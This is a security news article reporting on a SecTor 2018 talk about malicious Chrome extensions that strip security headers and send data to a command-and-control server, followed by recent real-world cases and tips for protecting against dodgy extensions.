You may trust your browser, but do you trust what it’s running? At SecTor 2018, threat intelligence specialist Lilly Chalupowski demonstrated why you shouldn’t.

Browser extensions are the small applications that your browser installs to provide extra features. These can do anything from translating web sites to letting you download videos from streaming sites. These extensions can be a huge problem.

When your best friend brings a new friend of theirs to your party, you assume that this new person will be well behaved. Most of the time, you’ll be right, because you trust your friend’s character judgements.

Trust no one

Browsers and extensions are the same. Your operating system already trusts the browser, which also means that it trusts whatever extra software the browser brings to the party, just as you do when you open the door to your best friend and his +1.

Occasionally, though, things go wrong. You’ll find that new party guest cooking crystal meth in your bathroom having broken open and pocketed your framed collection of memorial coins. Awkward.

The same is true of browser extensions. They can access all the URLs that you’re browsing along with the data that travels to and from those sites. They can also inject JavaScript into your browser’s communication with web sites. Giving them unfettered access to your web communications opens you up to attack.

As a security application developer in threat intelligence at GoSecure, Chalupowski spends her days thinking her way inside attackers’ heads. Her experience as a penetration tester has made her adept at identifying and documenting new attack vectors.

Google tries to protect you from malicious extensions in its Chrome browser. It includes features such as a content security policy, sandboxing, and Cross-Origin Resource Sharing, which lets developers limit requests between one web domain and another. It offers multiple security headers to help govern what information Chrome extensions can send.

Overriding security headers

Chaluposki blew right through those measures in her talk at SecTor 2018 using little more than a simple script.

“I can nuke what’s there and take it all out,” she says. “I thought there would have been something to prevent that but there’s not.”

In her talk, using JavaScript code small enough to fit on one presentation slide, Chalupowski found and removed the security headers from browser communications using simple regular expressions.

She then managed to communicate between the malicious extension and the command and control server, sending plain text login information from a banking site. She was also able to send malicious code from the C&C server back to the browser, triggering an alert box in her demo.

We sat down with Chalupowski to talk more about what she found:

Google does its best to check for malicious extensions in the Chrome web store, using machine learning. Nevertheless, they still slip through and compromise thousands of users by effectively turning the Chrome Web Store into a massive watering hole.

In January 2018, researchers at Gigamon’s applied threat research team found four malicious Chrome extensions that had compromised 500,000 users. Although the extensions did not contain malicious code themselves, they enabled their author to inject and run arbitrary JavaScript code from a C&C server. In that case, the attacker was probably using the extension for click fraud, the team suggested.

That same month, researchers found a malicious add-on called Tiempo en colombia en vivo, which, just like our unwanted party guest, refused to leave. It proved almost impossible to get rid of after blocking users from accessing the list of installed extensions using a simple redirect.

Often, crooks will use social engineering techniques like phishing to get these extensions onto unwitting users’ systems. One such scam, posing as an anti-cryptojacking extension, was found stealing victims’ private cryptocurrency keys in March 2019.

How to protect yourself

How can you protect yourself against dodgy extensions in Chrome and other browsers? As Chalupowski says in our interview, checking the extension’s page and looking for reviews is a good step. Looking for a developer web site and checking out its support page and privacy policy – if it has one – is also good cyberhygiene. Another useful port of call is the CRXcavator, which you can use to scan Chrome extensions via their IDs.

These steps alone isn’t enough, though; The fact that no one has found malicious activity in an extension doesn’t mean that it doesn’t exist. For extra protection, consider limiting the number of extensions you install and regularly reviewing those already installed on your system to see if you still use them. Reducing your attack surface is an important step for any browser user.


Bookmark and Share